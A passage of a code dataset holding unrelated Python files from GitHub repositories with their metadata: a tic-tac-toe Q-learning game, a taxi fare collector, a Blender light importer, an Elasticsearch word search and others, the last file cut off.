180687\")\nplt.show()\n","repo_name":"Irallia/IZW-HU-Parasites","sub_path":"scripts/plotChildrenHistogram.py","file_name":"plotChildrenHistogram.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"71652099601","text":"from .config import os_name\nimport collections\nimport re\nimport os\n\n\n__all__ = ['CoreFilenameInfo', 'core_filename_info']\n\n\nCoreFilenameInfo = collections.namedtuple(\n 'CoreFilenameInfo',\n ['filename',\n 'is_zip',\n 'is_keentools_core',\n 'version',\n 'os',\n 'is_nightly',\n 'nightly_build_number'])\n\n\ndef _parse_installation_filename(filename):\n m = re.match('keentools-core-(?P\\d+\\.\\d+\\.\\d+)' + \\\n '(?:\\.(?P\\d+))?-(?P[^-]+)\\.zip',\n filename)\n if not m:\n return None\n \n version_parsed = tuple([int(x) for x in m.group('version').split('.')])\n \n return (version_parsed, m.group('nightly_version'), m.group('os'))\n\n\ndef core_filename_info(filepath):\n _, filename = os.path.split(filepath)\n is_zip = filename.lower().endswith('.zip')\n parse_result = _parse_installation_filename(filename)\n if parse_result is None:\n return CoreFilenameInfo(filename, is_zip, False, None, None, None, None)\n \n version, nightly_version, os_parsed = parse_result\n \n return CoreFilenameInfo(filename, is_zip,\n True, version, os_parsed,\n nightly_version is not None, nightly_version)\n","repo_name":"KeenTools/keentools-blender","sub_path":"keentools/blender_independent_packages/pykeentools_loader/keentools_core_filename_info.py","file_name":"keentools_core_filename_info.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"3"} +{"seq_id":"30117700637","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Optional\n\nfrom pygame import Vector2\n\nfrom utilities import UnlockPack, Effect\nfrom ..battleroom import DMBattleRoom\n\nif TYPE_CHECKING:\n from dm.core.game.game import DMGame\n from dm.core.objects.unit import DMUnit\n################################################################################\n\n__all__ = (\"Plague\",)\n\n################################################################################\nclass Plague(DMBattleRoom):\n\n def __init__(self, game: DMGame, position: Optional[Vector2] = None, level: int = 1):\n\n super().__init__(\n game, position,\n _id=\"ROOM-200\",\n name=\"Plague\",\n description=(\n \"Gives {value} Poison and Corpse Explosion to all heroes in \"\n \"adjacent rooms whenever a hero enters the room.\"\n ),\n level=level,\n rank=6,\n unlock=UnlockPack.Awakening,\n effects=[\n Effect(name=\"Status\", base=24, per_lv=16),\n ]\n )\n\n################################################################################\n def on_enter(self, unit: DMUnit) -> None:\n\n for room in self.adjacent_rooms + [self]:\n for hero in room.heroes:\n for status in (\"Poison\", \"Corpse Explosion\"):\n hero.add_status(status, self.effects[\"Status\"], self)\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/rooms/SixStar/Plague.py","file_name":"Plague.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34809916052","text":"from datetime import datetime\nimport schedule\nimport sys\nfrom collector import PriceManipulator\nfrom config import 
load_config\nfrom data_store import save_record\nfrom tap30 import Tap30\nfrom snapp import Snapp\nfrom time import sleep\nfrom wait_time_calculator import waitTimeCalculator\n\n#initialize\nconfig_path = 'config.yaml'\nif len(sys.argv) == 2:\n config_path = sys.argv[1]\nconfig = load_config(config_path)\npm = PriceManipulator()\npm.add_app(Snapp, config['snapp_token'])\npm.add_app(Tap30, config['tap30_token'])\n\ndef collect_prices():\n first_try = True\n wt = waitTimeCalculator()\n while wt.still_error() or first_try:\n first_try = False\n try:\n app_price = pm.get_all_prices(config['start_cordinate'], config['dest_cordinate'])\n for app_name, price in app_price.items():\n print(datetime.now().strftime(\"%H:%M\"), app_name, price)\n save_record(price, config['result_store_path'][app_name])\n wt.reset()\n except Exception as e:\n print(e)\n wt.count_error()\n sleep_time = wt.get_wait_time()\n print(f\"waiting {sleep_time} seconds.\")\n sleep(sleep_time)\n\n# schedule\nschedule.every(config['get_price_intervals']).minutes.do(collect_prices)\nwhile True:\n schedule.run_pending()\n sleep(1)","repo_name":"erfan-mehraban/taxi-rent-data-collector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40717320071","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport Transmisor\nimport Receptor\n\ndef generarSeno(t, f, A):\n return A * np.sin(2 * np.pi * f * t)\n\n#Armado de señales de prueba\nfs = 100\nA = 1\nd = 1\n\nt = np.linspace(0, d, fs * d)\n\nf1 = 200\nseñal1 = generarSeno(t, f1, A)\n\nf2 = 300\nseñal2 = generarSeno(t, f2, A)\n\nf3 = 500\nseñal3 = generarSeno(t, f3, A)\n\nseñales = [señal1, señal2, señal3]\n\n#Grafico las 3 señales\nfig, (ax1, ax2, ax3) = plt.subplots(3, 1)\n\nax1.stem(t, señal1, 'r', markerfmt = ' ')\nax1.set_title('Señal 1, Frecuencia 200 Hz')\nax1.set_ylabel('Amplitud (A)')\nax1.set_xlabel('Tiempo (t)')\n\nax2.stem(t, señal2, 'y', markerfmt = ' ')\nax2.set_title('Señal 2, Frecuencia 300 Hz')\nax2.set_ylabel('Amplitud (A)')\nax2.set_xlabel('Tiempo (t)')\n\nax3.stem(t, señal3, 'b', markerfmt = ' ')\nax3.set_title('Señal 3, Frecuencia 500 Hz')\nax3.set_ylabel('Amplitud (A)')\nax3.set_xlabel('Tiempo (t)')\n\nfig.tight_layout(pad=0.8)\n\nplt.show()\n\n#Transmitiendo señal\nseñalMultiplexada = Transmisor.multiplexarSeñal(señales)\n\n#Grafico la señal multiplexada \ncantCanales = len(señales) #3\ndTotal = d * cantCanales\ntCanal = np.linspace(0, dTotal, fs * dTotal)\n\nplt.figure(figsize=(12,2))\nplt.stem(tCanal[0::3], señalMultiplexada[0::3], 'r', markerfmt = ' ')\nplt.stem(tCanal[1::3], señalMultiplexada[1::3], 'y', markerfmt = ' ')\nplt.stem(tCanal[2::3], señalMultiplexada[2::3], 'b', markerfmt = ' ')\nplt.title('Señal multiplexada')\nplt.ylabel('Amplitud (A)')\nplt.xlabel('Tiempo (t)')\n\nplt.show()\n\n#recibiendo señal \nseñalDemultiplexada = Receptor.demultiplexarSeñal(señalMultiplexada, cantCanales)\n\n#Grafico las señales demultiplexadas\nfig, (ax1, ax2, ax3) = plt.subplots(3, 1)\n\nsenal1_demultiplexada = señalDemultiplexada[0]\nax1.stem(t, senal1_demultiplexada, 'r', markerfmt = ' ')\nax1.set_title('Señal 1 demultiplexada')\nax1.set_ylabel('Amplitud (A)')\nax1.set_xlabel('Tiempo (t)')\n\nsenal2_demultiplexada = señalDemultiplexada[1]\nax2.stem(t, senal2_demultiplexada, 'y', markerfmt = ' ')\nax2.set_title('Señal 2 demultiplexada')\nax2.set_ylabel('Amplitud (A)')\nax2.set_xlabel('Tiempo 
(t)')\n\nsenal3_demultiplexada = señalDemultiplexada[2]\nax3.stem(t, senal3_demultiplexada, 'b', markerfmt = ' ')\nax3.set_title('Señal 3 demultiplexada')\nax3.set_ylabel('Amplitud (A)')\nax3.set_xlabel('Tiempo (t)')\n\nfig.tight_layout(pad=0.8)\n\nplt.show()","repo_name":"plopez90/procesamiento-senales-untref2022","sub_path":"TP_final-2022/Prueba_señal_seno.py","file_name":"Prueba_señal_seno.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35160325892","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name='index'),\n path(\"eng/\", views.eng_index, name='eng_index'),\n path(\"ru/\", views.ru_index, name='ru_index'),\n path(\"elmuse/\", views.elmuse, name='elmuse'),\n\n]","repo_name":"Dalalaler/project","sub_path":"src/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"39422297498","text":"from gi.repository import (EosCompanionAppService, GLib)\n\nBYTE_CHUNK_SIZE = 256\n\nLOAD_FROM_ENGINE_SUCCESS = 0\nLOAD_FROM_ENGINE_NO_SUCH_CONTENT = 1\n\n\ndef load_record_blob_from_shards(shards, content_id, attr):\n '''Load a blob for an app and content_id if given a set of shards.'''\n if attr not in ('data', 'metadata'):\n raise RuntimeError('attr must be one of \"data\" or \"metadata\"')\n\n for shard in shards:\n record = shard.find_record_by_hex_name(content_id)\n\n if not record:\n continue\n\n return LOAD_FROM_ENGINE_SUCCESS, getattr(record, attr)\n\n return LOAD_FROM_ENGINE_NO_SUCH_CONTENT, None\n\n\ndef load_record_from_shards_async(shards,\n content_id,\n attr,\n callback):\n '''Load bytes from stream for app and content_id.\n\n :attr: must be one of 'data' or 'metadata'.\n\n Once loading is complete, callback will be invoked with a GAsyncResult,\n use EosCompanionAppService.finish_load_all_in_stream_to_bytes\n to get the result or handle the corresponding error.\n\n Returns LOAD_FROM_ENGINE_SUCCESS if a stream could be loaded,\n LOAD_FROM_ENGINE_NO_SUCH_CONTENT if the content wasn't found.\n '''\n def _callback(_, result):\n '''Marshal the GAsyncReady callback into an (error, data) callback.'''\n try:\n bytes_data = EosCompanionAppService.finish_load_all_in_stream_to_bytes(result)\n except GLib.Error as error:\n callback(error, None)\n return\n\n callback(None, bytes_data)\n\n status, blob = load_record_blob_from_shards(shards,\n content_id,\n attr)\n\n if status == LOAD_FROM_ENGINE_NO_SUCH_CONTENT:\n GLib.idle_add(\n lambda: callback(\n GLib.Error(\n 'EKN ID {} not found in shards'.format(content_id),\n GLib.quark_to_string(EosCompanionAppService.error_quark()),\n EosCompanionAppService.Error.INVALID_CONTENT_ID\n ),\n None\n )\n )\n return\n\n EosCompanionAppService.load_all_in_stream_to_bytes(blob.get_stream(),\n chunk_size=BYTE_CHUNK_SIZE,\n cancellable=None,\n callback=_callback)\n","repo_name":"endlessm/eos-companion-app-integration","sub_path":"eoscompanion/ekn_data.py","file_name":"ekn_data.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"40308778754","text":"import numpy as np\nimport random\nimport os\n\nclass TicTacToe:\n def __init__(self):\n self.board = None\n self.current_state = None\n self.c_learning_rate = 0.1\n self.c_discount_value = 0.9\n self.exploration_rate = 0.3\n 
self.computer = None\n        self.computer_q_table = None\n        self.max_position_to_choose = None\n        self.max_q_value_to_choose = None\n        self.q_table_player_O = None\n        self.q_table_player_X = None\n        self.previous_action = None\n        self.previous_q_value = None\n        self.previous_state = None\n        self.reward_X = 0\n        self.reward_O = 0\n        self.c_episodes = 1000000\n\n    def save_file(self):\n        np.save(\"q_table_player_O.npy\", self.q_table_player_O)\n        np.save(\"q_table_player_X.npy\", self.q_table_player_X)\n    \n    def load_file(self):\n        self.q_table_player_X = np.load(\"q_table_player_X.npy\", allow_pickle= True)\n        self.q_table_player_O = np.load(\"q_table_player_O.npy\", allow_pickle= True)\n    \n    def have_file(self):\n        # check against the .npy filenames actually written by save_file()\n        if os.path.exists(\"./q_table_player_X.npy\") and os.path.exists(\"./q_table_player_O.npy\"):\n            return True\n        return False\n    \n    def update_exploration_rate(self):\n        if self.exploration_rate > 0.3:\n            self.exploration_rate *= 0.9\n    \n    def make_environment(self):\n        self.board = np.array([['-','-','-'],\n                        ['-','-','-'],\n                        ['-','-','-']], dtype = np.str0)\n        self.current_state = 19682 # by the state-encoding formula below, this is the empty-board state\n        \n        if not self.have_file():\n            self.q_table_player_X = np.random.uniform(low = 0, high = 1, size = [3**9,9])\n            self.q_table_player_O = np.random.uniform(low = 0, high = 1, size = [3**9,9])\n        else:\n            self.load_file()\n        \n        \n    def convert_to_state(self):\n        num = 0\n        multiplier = 1\n        for i in range(3):\n            for j in range(3):\n                if self.board[i, j] == 'X':\n                    num += 0 * multiplier\n                elif self.board[i, j] == 'O':\n                    num += 1 * multiplier\n                else: # empty-cell case\n                    num += 2 * multiplier\n                multiplier *= 3\n        return num\n    \n    \n    def reset(self):\n        self.board = np.array([['-','-','-'],\n                        ['-','-','-'],\n                        ['-','-','-']], dtype = np.str0)\n        self.current_state = self.convert_to_state() # empty-board state\n        self.previous_action = None\n        self.previous_q_value = None\n        self.previous_state = None\n        self.reward_O = 0\n        self.reward_X = 0\n        self.q_table_player_O = None\n        self.q_table_player_X = None\n    \n    def is_winner(self, player):\n        #Check row\n        for i in range (3):\n            win = True\n            for j in range (3):\n                if self.board[i][j] != player:\n                    win = False\n                    break\n            if win:\n                return True\n        \n        #Check column\n        for i in range(3):\n            win = True\n            for j in range (3):\n                if self.board[j][i] != player:\n                    win = False\n                    break\n            if win:\n                return True\n\n        #Check main diagonals\n        win = True\n        for i in range(3):\n            if self.board[i][i] != player:\n                win = False\n                break\n        if win:\n            return True\n        \n        #Check sub diagonals\n        win = True\n        for i in range(3):\n            if self.board[i][3-i-1] != player:\n                win = False\n                break\n        if win:\n            return True\n        \n        return False\n    \n    def is_draw(self):\n        draw = True\n        for i in range(3):\n            for j in (range(3)):\n                if self.board[i][j] == '-':\n                    draw = False\n        return draw\n    \n    def get_reward_player_X(self):\n        if self.is_winner('X'):\n            self.reward_X = 1\n            self.reward_O = -1\n    \n    def get_reward_player_O(self):\n        if self.is_winner('O'):\n            self.reward_O = 1\n            self.reward_X = -1\n    \n    def get_reward(self):\n        # rewards are zeroed in play() before this is called, so a draw keeps (0, 0);\n        # each helper only sets rewards when its player has actually won\n        self.get_reward_player_X()\n        self.get_reward_player_O()\n    \n    def swap_player(self, player):\n        return 'X' if player == 'O' else 'O'\n    \n    def chooseAction(self, current_state, q_table_player):\n        for i in range(9):\n            if self.board[i//3][i%3] == '-': \n                self.max_q_value_to_choose = q_table_player[current_state][i]\n                self.max_position_to_choose = i\n                break\n        for i in range(9):\n            if self.max_q_value_to_choose < 
q_table_player[current_state][i]:\n                if self.board[i//3][i%3] == '-': \n                    self.max_q_value_to_choose = q_table_player[current_state][i]\n                    self.max_position_to_choose = i\n        return self.max_position_to_choose\n    \n    def play(self, player):\n        \n        random_value = random.random()\n        action = None\n        \n        if random_value > self.exploration_rate:\n            if player == 'O':\n                action = self.chooseAction(self.current_state, self.q_table_player_O)\n                current_q_value = self.q_table_player_O[self.current_state][action]\n            else:\n                action = self.chooseAction(self.current_state, self.q_table_player_X) \n                current_q_value = self.q_table_player_X[self.current_state][action]\n        else:\n            action = random.randint(0,8)\n            while self.board[action//3][action%3] != '-':\n                action = random.randint(0,8)\n            if player == 'O':\n                current_q_value = self.q_table_player_O[self.current_state][action]\n            else:\n                current_q_value = self.q_table_player_X[self.current_state][action]\n        \n        self.update_exploration_rate()\n        self.board[action//3][action%3] = player\n        next_q_state = self.convert_to_state()\n        \n        self.reward_X = 0\n        self.reward_O = 0\n        self.get_reward()\n        if player == 'O':\n            new_q_value = (1-self.c_learning_rate)*current_q_value + self.c_learning_rate*(self.reward_O + self.c_discount_value*np.max(self.q_table_player_O[next_q_state]))\n            \n            #if self.previous_action != None or self.previous_q_value != None or self.previous_state != None:\n            if self.reward_O == 1:\n                new_q_value = (1-self.c_learning_rate)*self.previous_q_value + self.c_learning_rate*(self.reward_X + self.c_discount_value*np.max(self.q_table_player_X[self.current_state]))\n                self.q_table_player_X[self.previous_state][self.previous_action] = new_q_value\n            \n            \n            self.q_table_player_O[self.current_state][action] = new_q_value\n            self.previous_state = self.current_state\n            self.current_state = next_q_state\n        else:\n            new_q_value = (1-self.c_learning_rate)*current_q_value + self.c_learning_rate*(self.reward_X + self.c_discount_value*np.max(self.q_table_player_X[next_q_state]))\n            \n            #if self.previous_action != None or self.previous_q_value != None or self.previous_state != None:\n            if self.reward_X == 1:\n                new_q_value = (1-self.c_learning_rate)*self.previous_q_value + self.c_learning_rate*(self.reward_O + self.c_discount_value*np.max(self.q_table_player_O[self.current_state]))\n                self.q_table_player_O[self.previous_state][self.previous_action] = new_q_value\n            \n            self.q_table_player_X[self.current_state][action] = new_q_value\n            self.previous_state = self.current_state\n            self.current_state = next_q_state\n        \n        self.previous_q_value = current_q_value\n        self.previous_action = action\n        \n\n    def train(self):\n        player = 'X'\n        episodes = self.c_episodes\n        \n        for ep in range(episodes):\n            player = 'X'\n            print(\"Eps = {}\".format(ep))\n            \n            while True:\n                self.play(player)\n                if self.is_winner('X') or self.is_winner('O') or self.is_draw():\n                    self.save_file()\n                    self.reset()\n                    self.load_file()\n                    break\n                player = self.swap_player(player)\n\n\n    def play_vs_human(self):\n        self.reset()\n        self.load_file()\n        human = input(\"Choose your turn X/O: \")\n        if (human == 'X'):\n            self.computer = 'O'\n            self.computer_q_table = self.q_table_player_O\n        else: \n            self.computer = 'X'\n            self.computer_q_table = self.q_table_player_X\n        \n        turn = human\n        while True:\n            if turn == human:\n                action = int(input(\"Input position to fix the spot: \"))\n                while self.board[action//3][action%3] != '-':\n                    print(\"That position is already filled.\")\n                    action = int(input(\"Input position to fix the spot: \"))\n                self.board[action//3][action%3] = human\n                
self.current_state = self.convert_to_state()\n            else:\n                action = self.chooseAction(self.current_state, self.computer_q_table)\n                self.board[action//3][action%3] = self.computer\n                self.current_state = self.convert_to_state()\n            \n            print(self.board)\n            if self.is_winner(human):\n                print(\"Human wins!\")\n                break\n            if self.is_winner(self.computer):\n                print(\"Computer wins!\")\n                break\n            if self.is_draw():\n                print(\"Draw!!!\")\n                break\n            turn = self.swap_player(turn)\n    \nboardgame = TicTacToe()\nboardgame.make_environment()\n#boardgame.train()\nboardgame.play_vs_human()","repo_name":"thangnguyen021203/Tic-Tac-Toe","sub_path":"TicTacToe_qlearning.py","file_name":"TicTacToe_qlearning.py","file_ext":"py","file_size_in_byte":10276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"41531063738","text":"import RPi.GPIO as GPIO\nimport datetime\nimport time\n\n# Duration of time motor continues to spin after deactivation.\nMOTOR_LAG = datetime.timedelta(seconds = 0.25)\n\nclass PiGpioMotor():\n    def __init__(self, pin, rpm):\n        self._rpm = rpm\n        self._pin = pin\n\n    def rotate(self, rotations):\n        duration = datetime.timedelta(minutes = rotations / self._rpm)\n        if duration > MOTOR_LAG:\n            duration = duration - MOTOR_LAG\n\n        GPIO.setwarnings(False)\n        GPIO.cleanup(self._pin)\n        GPIO.setmode(GPIO.BOARD)\n        GPIO.setup(self._pin, GPIO.OUT)\n        GPIO.output(self._pin, GPIO.HIGH)\n        GPIO.output(self._pin, GPIO.LOW)\n        time.sleep(duration.total_seconds())\n        GPIO.output(self._pin, GPIO.HIGH)\n        GPIO.cleanup(self._pin)\n","repo_name":"trevorgud/cat-feeder","sub_path":"catfeeder/rpi_motor.py","file_name":"rpi_motor.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14228556341","text":"import bpy\nimport numpy as np\n\n\ndef import_lights(parent_obj, model_data):\n    for i, light_data in enumerate(model_data.light_sources):\n        if light_data.mode == 0:  # Point\n            l_type = \"POINT\"\n            light_name = \"PointLamp\" + f'{light_data.light_id}'.rjust(2, '0')\n        elif light_data.mode == 2:  # Ambient\n            l_type = \"AREA\"\n            light_name = \"AmbientLamp\"\n        elif light_data.mode == 3:  # Directional\n            l_type = \"SUN\"\n            light_name = \"DirLamp\" + f'{light_data.light_id}'.rjust(2, '0')\n        elif light_data.mode == 4:  # Fog\n            l_type = \"AREA\"\n            light_name = \"Fog\"\n        else:\n            assert 0, f\"Unknown light mode enum \\'{light_data.mode}\\'.\"\n\n        light = bpy.data.lights.new(light_name, l_type)\n        light.energy = light_data.intensity\n        light.color = (light_data.red, light_data.green, light_data.blue)\n\n        light_obj = bpy.data.objects.new(light_name, light)\n        bpy.context.collection.objects.link(light_obj)\n        light_obj.parent = parent_obj\n\n        # Add data that I don't think Blender can handle\n        if light_data.mode == 4:\n            light_obj[\"Unknown_Fog_Param\"] = light_data.unknown_fog_param\n            light_obj[\"Alpha\"] = light_data.alpha\n\n        # Attach it to a bone if it isn't fog\n        if light_data.mode != 4:\n            light_obj.rotation_euler[0] = -90 * (np.pi/180)\n            constraint = light_obj.constraints.new(\"CHILD_OF\")\n            constraint.target = bpy.data.objects[f\"{parent_obj.name}_armature\"]\n\n            constraint.subtarget = light_data.bone_name\n","repo_name":"Pherakki/Blender-Tools-for-DSCS","sub_path":"BlenderIO/Import/LightImport.py","file_name":"LightImport.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"22"} +{"seq_id":"27749045190","text":"from 
keras.preprocessing import image\nfrom keras import models\nimport numpy as np\nfrom PIL import Image\n\n\nmodel = models.load_model('./model')\n\ndef load_image(caminho):\n    return Image.open(caminho).convert('RGB')\n\ndef formatImage(img):\n    # 'img' avoids shadowing the keras.preprocessing 'image' module imported above\n    img = img.resize((64,64), Image.BILINEAR)\n    img = image.img_to_array(img)\n    img /= 255\n    img = np.expand_dims(img, axis = 0)\n    return img\n\nnormal_image = load_image('chest_xray_dataset/test/NORMAL/IM-0001-0001.jpeg')\n\nimage_pneumonia = load_image('chest_xray_dataset/test/PNEUMONIA/person1_virus_6.jpeg')\n\nnormal_image = formatImage(normal_image)\nimage_pneumonia = formatImage(image_pneumonia)\n\nnormal_prediction = model.predict(normal_image)\npneumonia_prediction = model.predict(image_pneumonia)\nprint(normal_prediction)\nprint(pneumonia_prediction)\n","repo_name":"kmvbatista/pneumonia-detector","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"41243026693","text":"from functools import reduce\nfrom logging import getLogger\nimport re\n\nfrom packages.core.scraper.page_objects import JsonPage\n\nfrom .utils.datetime import str_to_datetime\nfrom .utils.teacher import url_to_username\n\nlogger = getLogger('log_print')\n\n\nclass CoursesPage(JsonPage):\n\n    def resolve(self):\n        \"\"\"Update format of course(state) to match database\n\n        Args:\n            course (dict): course to transform\n        \"\"\"\n        if not hasattr(self, '_course'):\n            course = self.state\n            course['release'] = str_to_datetime(course['release'])\n            course['teacher']['username'] = url_to_username(course['teacher'].pop('path'))\n            course['teacher']['role'] = 'teacher'\n\n            lessons = reduce((lambda memo, cap: memo + cap['lessons']), course.pop('captions'), [])\n            course['lessons'] = tuple(filter(lambda lesson: bool(lesson.get('external_id')), lessons))\n            for index, lesson in enumerate(course['lessons']):\n                lesson['track_number'] = index + 1\n            self._course = course\n        return self._course\n","repo_name":"jmillandev/platzi-scraper","sub_path":"packages/courses/page_objects.py","file_name":"page_objects.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74647520377","text":"'''This handles all of the searching and the tracking of word data'''\nimport re\nimport os, sys\nimport json\nimport nltk\nfrom elasticsearch import Elasticsearch\n\n\nes = Elasticsearch([{'host':'localhost', 'port': 9200}])\ntokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\ndocdir = \"docs\"\nHOST = \"127.0.0.1:9200\"\nINDEX = \"docs\"\nTYPE = \"txt\"\n\nclass Words:\n\t'''Handles the word frequencies, the most common words, etc'''\n\tdef __init__(self):\n\t\tself.words = []\n\t\tself.topwords = []\n\t\tself.wordfreq = []\n\t\tself.wordlist = []\n\n\tdef wordListToFreqDict(self):\n\t\t'''Counts the word frequencies for the given text, and compresses it into a dictionary.'''\n\t\tself.wordfreq = [self.wordlist.count(p) for p in self.wordlist]\n\t\tself.words = dict(zip(self.wordlist,self.wordfreq))\n\n\tdef sortFreqDict(self):\n\t\t'''Sorts a dictionary generated by wordListToFreqDict() based on the calculated frequency'''\n\t\taux = [(self.words[key], key) for key in self.words]\n\t\taux.sort()\n\t\taux.reverse()\n\t\tself.words = aux\n\t\t\n\tdef getWords(self, num):\n\t\t'''Gets search results for the {{num}} most common words in the 
index'''\n\t\tthesewords = self.words[0:num]\n\t\tsearchlist = []\n\t\tfor w in thesewords:\n\t\t\tsearchresults = self.search(w[1])\n\t\t\tfor finding in searchresults:\n\t\t\t\t# Flatten the results so it can be used by datatables\n\t\t\t\tformatted = [w[1], finding[\"_source\"][\"filename\"], self.highlightWord(finding[\"_source\"][\"text\"], w[1])]\n\t\t\t\tsearchlist.append(formatted)\n\t\treturn searchlist\n\t\t\n\tdef search(self, term):\n\t\t'''This performs the search on elasticsearch indexes'''\n\t\tresult = es.search(index=INDEX, doc_type=TYPE, body={\"query\": {\"match\" : {\"text\": term.strip()}}})\n\t\tif result.get('hits') is not None and result['hits'].get('hits') is not None:\n\t\t\thits = result['hits']['hits']\n\t\telse:\n\t\t\thits = {}\n\t\t\n\t\treturn hits\n\t\t\n\tdef highlightWord(self, sentence, word):\n\t\t'''Simple function to highlight a given word and return the result with HTML formatting applied'''\n\t\t\n\t\t# We want to replace the word no matter the capitalisation...\n\t\ttry:\n\t\t\tresults = [m.start() for m in re.finditer(word.lower(), sentence.lower())]\n\t\texcept:\n\t\t\treturn sentence\n\t\t\t\n\t\tif results is None or len(results) == 0:\n\t\t\treturn sentence\n\t\t\t\n\t\t#results = sorted(results, key=int, reverse=True)\n\t\tresults.sort(reverse=True)\n\t\t\n\t\t# Find the search term (case insensitive) and wrap it in bold tags\n\t\tfor widx in results:\n\t\t\tsentence = sentence[:widx] + \"<b>\" + sentence[widx:widx+len(word)] + \"</b>\" + sentence[widx+len(word):]\n\t\t\n\t\treturn sentence\n\t\t\ndef indexDocs(stopwords):\n\t'''Originally it was planned that Elasticsearch do this, but I couldn't get the analytics to work right, so \n\tI calculated word frequencies this way.'''\n\ttext_docs = []\n\twordfreq = []\n\toverallwords = []\n\tfor f in os.listdir(\"docs\"):\n\t\t# Cycle through files in docs\n\t\tif f.endswith('.txt'):\n\t\t\t# Only handle txt files\n\t\t\tfp = open(os.path.join(docdir, f), encoding='utf8')\n\t\t\tdata = fp.read()\n\t\t\twordlist = data.split()\n\t\t\t\n\t\t\t# Remove any special characters from words\n\t\t\twordlist = [p.translate(dict.fromkeys(map(ord,u',!.-;\"?:'))) for p in wordlist]\n\t\t\tfor w in wordlist:\n\t\t\t\tw = w.strip().lower()\n\t\t\t\tif w in stopwords:\n\t\t\t\t\t# Only add if the words aren't in the \"stopwords\" list\n\t\t\t\t\tcontinue\n\t\t\t\telif len(w) > 0:\n\t\t\t\t\t# Ignore blank strings\n\t\t\t\t\twordfreq.append(wordlist.count(w))\n\t\t\t\t\toverallwords.append(w)\n\treturn overallwords, wordfreq\n\ndef loadStopWords():\n\t# Load stopwords from file\n\twords = []\n\twith open(\"stopwords.txt\", encoding='utf8') as stopfile:\n\t\twords = stopfile.readlines()\n\twords = [x.strip() for x in words]\n\twords = list(filter(None, words))\n\treturn words\n","repo_name":"cyramic/cyramdocumentindex","sub_path":"Words.py","file_name":"Words.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"17546410331","text":"# coding=utf-8\n\n\"\"\"Backlog module.\"\"\"\nfrom __future__ import unicode_literals\n\nimport datetime\nimport logging\nimport threading\nfrom builtins import object\nfrom builtins import str\nfrom uuid import uuid4\n\nfrom medusa import app, db, ui, ws\nfrom medusa.logger.adapters.style import BraceAdapter\nfrom medusa.schedulers import scheduler\nfrom medusa.search.queue import BacklogQueueItem\n\nfrom six import iteritems\n\nlog = 
BraceAdapter(logging.getLogger(__name__))\nlog.logger.addHandler(logging.NullHandler())\n\n\nclass BacklogSearchScheduler(scheduler.Scheduler):\n \"\"\"Backlog search scheduler class.\"\"\"\n\n def force_search(self):\n \"\"\"Set the last backlog in the DB.\"\"\"\n self.action._set_last_backlog(1)\n self.lastRun = datetime.datetime.fromordinal(1)\n\n def next_run(self):\n \"\"\"Return when backlog should run next.\"\"\"\n if self.action._last_backlog <= 1:\n return datetime.date.today()\n else:\n backlog_frequency_in_days = int(self.action.cycleTime)\n return datetime.date.fromordinal(self.action._last_backlog + backlog_frequency_in_days)\n\n\nclass BacklogSearcher(object):\n \"\"\"Backlog Searcher class.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the class.\"\"\"\n self._last_backlog = self._get_last_backlog()\n self.cycleTime = app.BACKLOG_FREQUENCY / 60.0 / 24\n self.lock = threading.Lock()\n self.amActive = False\n self.amPaused = False\n self.amWaiting = False\n self.forced = False\n self.currentSearchInfo = {}\n\n self._to_json = {\n 'identifier': str(uuid4()),\n 'name': 'BACKLOG',\n 'queueTime': str(datetime.datetime.utcnow()),\n 'force': self.forced\n }\n\n self._reset_pi()\n\n def _reset_pi(self):\n \"\"\"Reset percent done.\"\"\"\n self.percentDone = 0\n self.currentSearchInfo = {'title': 'Initializing'}\n\n def get_progress_indicator(self):\n \"\"\"Get backlog search progress indicator.\"\"\"\n if self.amActive:\n return ui.ProgressIndicator(self.percentDone, self.currentSearchInfo)\n else:\n return None\n\n def am_running(self):\n \"\"\"Check if backlog is running.\"\"\"\n log.debug(u'amWaiting: {0}, amActive: {1}', self.amWaiting, self.amActive)\n return (not self.amWaiting) and self.amActive\n\n def search_backlog(self, which_shows=None):\n \"\"\"Run the backlog search for given shows.\"\"\"\n if self.amActive:\n log.debug(u'Backlog is still running, not starting it again')\n return\n\n if app.forced_search_queue_scheduler.action.is_forced_search_in_progress():\n log.warning(u'Manual search is running. 
